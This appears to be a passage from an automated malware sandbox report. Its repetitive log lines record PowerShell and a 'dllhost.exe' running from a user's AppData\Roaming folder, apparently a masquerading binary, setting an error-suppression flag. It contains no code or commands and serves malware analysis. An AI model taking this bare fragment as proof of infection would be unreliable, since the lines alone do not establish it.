Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
